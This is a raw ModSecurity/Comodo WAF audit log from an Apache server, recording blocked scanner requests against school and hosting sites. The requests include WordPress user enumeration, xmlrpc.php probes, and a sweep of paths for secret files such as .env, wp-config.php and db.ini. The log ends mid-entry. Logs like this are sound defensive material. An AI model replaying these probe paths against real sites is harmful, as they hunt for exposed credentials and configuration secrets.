"pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730426571599 6278 (- - -) Stopwatch2: 1746730426571599 6278; combined=4503, p1=590, p2=3646, p3=64, p4=40, p5=98, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --965fa210-Z-- --09afac62-A-- [09/May/2025:01:54:02 +0700] aBz9yqcs1DvJ_HgMHE95uAAAAAM 103.236.140.4 53836 103.236.140.4 8181 --09afac62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09afac62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09afac62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730442324509 12597 (- - -) Stopwatch2: 1746730442324509 12597; combined=19801, p1=469, p2=926, p3=0, p4=0, p5=9222, sr=77, sw=0, l=0, gc=9184 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09afac62-Z-- --73d5e658-A-- [09/May/2025:01:54:05 +0700] aBz9zacs1DvJ_HgMHE95ugAAAA0 103.236.140.4 53840 103.236.140.4 8181 --73d5e658-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --73d5e658-C-- demo.sayHello --73d5e658-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --73d5e658-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730445181281 5554 (- - -) Stopwatch2: 1746730445181281 5554; combined=4076, p1=493, p2=3361, p3=28, p4=32, p5=95, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73d5e658-Z-- --3375a52d-A-- [09/May/2025:01:57:45 +0700] aBz-qacs1DvJ_HgMHE95vwAAABA 103.236.140.4 53862 103.236.140.4 8181 --3375a52d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3375a52d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3375a52d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730665933750 2800 (- - -) Stopwatch2: 1746730665933750 2800; combined=1347, p1=451, p2=866, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3375a52d-Z-- --4a844c66-A-- [09/May/2025:01:57:49 +0700] aBz-racs1DvJ_HgMHE95wQAAABM 103.236.140.4 53870 103.236.140.4 8181 --4a844c66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a844c66-C-- demo.sayHello --4a844c66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a844c66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730669487484 5826 (- - -) Stopwatch2: 1746730669487484 5826; combined=4281, p1=567, p2=3475, p3=34, p4=38, p5=98, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a844c66-Z-- --bfa3dd07-A-- [09/May/2025:01:59:00 +0700] aBz-9I4K347NtBcwXKx01AAAAIU 103.236.140.4 53880 103.236.140.4 8181 --bfa3dd07-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bfa3dd07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfa3dd07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730740489774 3138 (- - -) Stopwatch2: 1746730740489774 3138; combined=1345, p1=448, p2=867, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfa3dd07-Z-- --f5946c55-A-- [09/May/2025:01:59:03 +0700] aBz-944K347NtBcwXKx01QAAAIw 103.236.140.4 53884 103.236.140.4 8181 --f5946c55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f5946c55-C-- demo.sayHello --f5946c55-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5946c55-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730743733439 6603 (- - -) Stopwatch2: 1746730743733439 6603; combined=4781, p1=620, p2=3916, p3=38, p4=42, p5=99, sr=78, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5946c55-Z-- --18c7f02b-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx13wAAAIY 103.236.140.4 55066 103.236.140.4 8181 --18c7f02b-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --18c7f02b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18c7f02b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547173989 764 (- - -) Stopwatch2: 1746731547173989 764; combined=335, p1=297, p2=0, p3=0, p4=0, p5=37, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18c7f02b-Z-- --95a0da45-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx14AAAAII 103.236.140.4 55068 103.236.140.4 8181 --95a0da45-B-- GET /config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --95a0da45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95a0da45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547349760 701 (- - -) Stopwatch2: 1746731547349760 701; combined=263, p1=230, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95a0da45-Z-- --abf0295f-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx14gAAAIU 103.236.140.4 55072 103.236.140.4 8181 --abf0295f-B-- GET /.env.production HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --abf0295f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abf0295f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547595058 659 (- - -) Stopwatch2: 1746731547595058 659; combined=280, p1=248, p2=0, p3=0, p4=0, p5=32, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abf0295f-Z-- --2b8ee044-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx14wAAAIw 103.236.140.4 55074 103.236.140.4 8181 --2b8ee044-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2b8ee044-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b8ee044-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547771439 660 (- - -) Stopwatch2: 1746731547771439 660; combined=280, p1=247, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b8ee044-Z-- --0bb7d048-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx15AAAAIc 103.236.140.4 55076 103.236.140.4 8181 --0bb7d048-B-- GET /settings/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0bb7d048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bb7d048-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547937852 676 (- - -) Stopwatch2: 1746731547937852 676; combined=276, p1=223, p2=0, p3=0, p4=0, p5=53, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bb7d048-Z-- --5c35b920-A-- [09/May/2025:02:12:29 +0700] aB0CHKcs1DvJ_HgMHE954gAAAAw 103.236.140.4 55096 103.236.140.4 8181 --5c35b920-B-- GET /db.ini HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5c35b920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c35b920-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731548999503 1680 (- - -) Stopwatch2: 1746731548999503 1680; combined=647, p1=329, p2=292, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c35b920-Z-- --0f809878-A-- [09/May/2025:02:12:33 +0700] aB0CIacs1DvJ_HgMHE954wAAABA 103.236.140.4 55148 103.236.140.4 8181 --0f809878-B-- GET /docker/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0f809878-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f809878-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731553156572 687 (- - -) Stopwatch2: 1746731553156572 687; combined=276, p1=242, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f809878-Z-- --11ab013a-A-- [09/May/2025:02:12:33 +0700] aB0CIY4K347NtBcwXKx1_gAAAJU 103.236.140.4 55150 103.236.140.4 8181 --11ab013a-B-- GET /wp-config.php HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --11ab013a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11ab013a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731553340748 656 (- - -) Stopwatch2: 1746731553340748 656; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11ab013a-Z-- --f75aae68-A-- [09/May/2025:02:12:34 +0700] aB0CIo4K347NtBcwXKx2AQAAAIg 103.236.140.4 55158 103.236.140.4 8181 --f75aae68-B-- GET /env.backup HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f75aae68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f75aae68-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731554037762 1533 (- - -) Stopwatch2: 1746731554037762 1533; combined=636, p1=310, p2=298, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f75aae68-Z-- --7ca6814a-A-- [09/May/2025:02:12:34 +0700] aB0CIo4K347NtBcwXKx2AwAAAIY 103.236.140.4 55164 103.236.140.4 8181 --7ca6814a-B-- GET /settings.bak HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --7ca6814a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ca6814a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731554249469 1675 (- - -) Stopwatch2: 1746731554249469 1675; combined=623, p1=299, p2=293, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ca6814a-Z-- --cfc6cc1f-A-- [09/May/2025:02:12:34 +0700] aB0CIo4K347NtBcwXKx2BQAAAIM 103.236.140.4 55168 103.236.140.4 8181 --cfc6cc1f-B-- GET /old/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cfc6cc1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfc6cc1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731554580649 654 (- - -) Stopwatch2: 1746731554580649 654; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfc6cc1f-Z-- --150d876a-A-- [09/May/2025:02:12:35 +0700] aB0CI44K347NtBcwXKx2CgAAAIo 103.236.140.4 55180 103.236.140.4 8181 --150d876a-B-- GET /laravel/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --150d876a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --150d876a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731555304892 642 (- - -) Stopwatch2: 1746731555304892 642; combined=260, p1=214, p2=0, p3=0, 